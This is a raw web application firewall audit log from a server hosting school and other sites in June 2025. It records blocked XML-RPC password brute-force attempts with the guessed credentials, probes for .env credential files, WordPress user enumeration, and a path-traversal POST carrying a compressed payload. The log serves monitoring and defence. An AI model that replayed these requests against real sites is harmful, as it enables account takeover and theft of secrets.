60058 103.236.140.4 8181 --db38e060-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --db38e060-C-- wp.getUsersBlogs kresno qwer123456 --db38e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db38e060-E-- --db38e060-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123450201469 4287 (- - -) Stopwatch2: 1749123450201469 4287; combined=3241, p1=348, p2=2727, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db38e060-Z-- --2ab2da6f-A-- [05/Jun/2025:18:38:37 +0700] aEGBvX-K7ToMdu-YSIJX0gAAAAI 103.236.140.4 60204 103.236.140.4 8181 --2ab2da6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2ab2da6f-C-- wp.getUsersBlogs kresno superman1 --2ab2da6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ab2da6f-E-- --2ab2da6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123517773642 4296 (- - -) Stopwatch2: 1749123517773642 4296; combined=3272, p1=360, p2=2721, p3=0, p4=0, p5=110, sr=80, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ab2da6f-Z-- --4bf0f567-A-- [05/Jun/2025:18:39:38 +0700] aEGB-uth7G2xELALzPZeXgAAANY 103.236.140.4 60306 103.236.140.4 8181 --4bf0f567-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4bf0f567-C-- wp.getUsersBlogs kresno richard --4bf0f567-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bf0f567-E-- --4bf0f567-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123578421940 5417 (- - -) Stopwatch2: 1749123578421940 5417; combined=3843, p1=500, p2=3172, p3=0, p4=0, p5=101, sr=126, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bf0f567-Z-- --872d3075-A-- [05/Jun/2025:18:40:12 +0700] aEGCHOth7G2xELALzPZelAAAAM0 103.236.140.4 60418 103.236.140.4 8181 --872d3075-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --872d3075-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin& --872d3075-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --872d3075-E-- --872d3075-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749123612267714 5274 (- - -) Stopwatch2: 1749123612267714 5274; combined=4227, p1=369, p2=3599, p3=37, p4=43, p5=105, sr=77, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --872d3075-Z-- --c234d254-A-- [05/Jun/2025:18:50:48 +0700] aEGEmH-K7ToMdu-YSIJYKwAAAAY 103.236.140.4 60684 103.236.140.4 8181 --c234d254-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 18.216.69.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 18.216.69.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c234d254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c234d254-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124248210302 3363 (- - -) Stopwatch2: 1749124248210302 3363; combined=1441, p1=496, p2=912, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c234d254-Z-- --80ed7a43-A-- [05/Jun/2025:18:57:01 +0700] aEGGDSrHpfaS2Cuwh8ULtQAAAE8 103.236.140.4 60790 103.236.140.4 8181 --80ed7a43-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --80ed7a43-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin22admin22 --80ed7a43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80ed7a43-E-- --80ed7a43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124621404730 3790 (- - -) Stopwatch2: 1749124621404730 3790; combined=2544, p1=332, p2=2097, p3=0, p4=0, p5=68, sr=62, sw=47, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80ed7a43-Z-- --f7da5f17-A-- [05/Jun/2025:18:59:19 +0700] aEGGlyrHpfaS2Cuwh8ULtgAAAFc 103.236.140.4 60826 103.236.140.4 8181 --f7da5f17-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 41.70.100.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f7da5f17-C-- system.multicallmethodNamewp.getUsersBlogsparamsfixitadminantixadmin --f7da5f17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7da5f17-E-- --f7da5f17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.70.100.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124759681741 5145 (- - -) Stopwatch2: 1749124759681741 5145; combined=3365, p1=455, p2=2787, p3=0, p4=0, p5=75, sr=66, sw=48, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7da5f17-Z-- --56f45d1a-A-- [05/Jun/2025:19:00:59 +0700] aEGG-3-K7ToMdu-YSIJYVAAAAA8 103.236.140.4 60864 103.236.140.4 8181 --56f45d1a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --56f45d1a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1qaz2wsx --56f45d1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56f45d1a-E-- --56f45d1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124859321471 6346 (- - -) Stopwatch2: 1749124859321471 6346; combined=4368, p1=551, p2=3682, p3=0, p4=0, p5=81, sr=93, sw=54, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56f45d1a-Z-- --88b8f163-A-- [05/Jun/2025:19:03:23 +0700] aEGHi3-K7ToMdu-YSIJYZgAAABU 103.236.140.4 60910 103.236.140.4 8181 --88b8f163-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.182.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.182.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:88.0) Gecko/20100101 Firefox/88.0 Accept-Charset: utf-8 --88b8f163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88b8f163-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749125003482279 708 (- - -) Stopwatch2: 1749125003482279 708; combined=286, p1=248, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88b8f163-Z-- --7a155877-A-- [05/Jun/2025:19:04:45 +0700] aEGH3X-K7ToMdu-YSIJYcAAAAAM 103.236.140.4 60940 103.236.140.4 8181 --7a155877-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7a155877-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix1234$ --7a155877-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a155877-E-- --7a155877-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125085981396 5258 (- - -) Stopwatch2: 1749125085981396 5258; combined=3887, p1=444, p2=3200, p3=0, p4=0, p5=142, sr=86, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a155877-Z-- --8e34846d-A-- [05/Jun/2025:19:07:22 +0700] aEGIeirHpfaS2Cuwh8ULxAAAAFY 103.236.140.4 60988 103.236.140.4 8181 --8e34846d-B-- POST /userentry?accountId=/../../../tomcat/webapps/Zm79I/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173975456 --8e34846d-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --8e34846d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e34846d-E-- --8e34846d-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125242035292 3573 (- - -) Stopwatch2: 1749125242035292 3573; combined=2243, p1=386, p2=1828, p3=0, p4=0, p5=28, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e34846d-Z-- --ce1d1249-A-- [05/Jun/2025:19:07:27 +0700] aEGIf-th7G2xELALzPZe2gAAAMg 103.236.140.4 60992 103.236.140.4 8181 --ce1d1249-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.65.15.81 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* Cookie: X-Forwarded-For: 159.65.15.81 Accept-Encoding: gzip X-Varnish: 172954166 --ce1d1249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce1d1249-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749125247280405 718 (- - -) Stopwatch2: 1749125247280405 718; combined=266, p1=233, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce1d1249-Z-- --78dc801f-A-- [05/Jun/2025:19:07:49 +0700] aEGIleth7G2xELALzPZe3QAAAMs 103.236.140.4 32778 103.236.140.4 8181 --78dc801f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.161.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.161.6 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --78dc801f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh& --78dc801f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --78dc801f-E-- --78dc801f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749125269463073 5106 (- - -) Stopwatch2: 1749125269463073 5106; combined=3892, p1=374, p2=3301, p3=22, p4=24, p5=101, sr=94, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dc801f-Z-- --346cfa78-A-- [05/Jun/2025:19:08:36 +0700] aEGIxOth7G2xELALzPZe3wAAANE 103.236.140.4 32786 103.236.140.4 8181 --346cfa78-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 41.70.100.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --346cfa78-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminpass123456 --346cfa78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --346cfa78-E-- --346cfa78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.70.100.6 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125316954198 5612 (- - -) Stopwatch2: 1749125316954198 5612; combined=4053, p1=487, p2=3362, p3=0, p4=0, p5=117, sr=95, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --346cfa78-Z-- --8972d751-A-- [05/Jun/2025:19:10:37 +0700] aEGJPVwdJdhOudw5hdz_yAAAAJM 103.236.140.4 32812 103.236.140.4 8181 --8972d751-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8972d751-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh971 --8972d751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8972d751-E-- --8972d751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125437178146 6430 (- - -) Stopwatch2: 1749125437178146 6430; combined=4566, p1=550, p2=3789, p3=0, p4=0, p5=130, sr=94, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8972d751-Z-- --7b856266-A-- [05/Jun/2025:19:14:40 +0700] aEGKMFwdJdhOudw5hdz_5wAAAIE 103.236.140.4 32906 103.236.140.4 8181 --7b856266-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7b856266-C-- 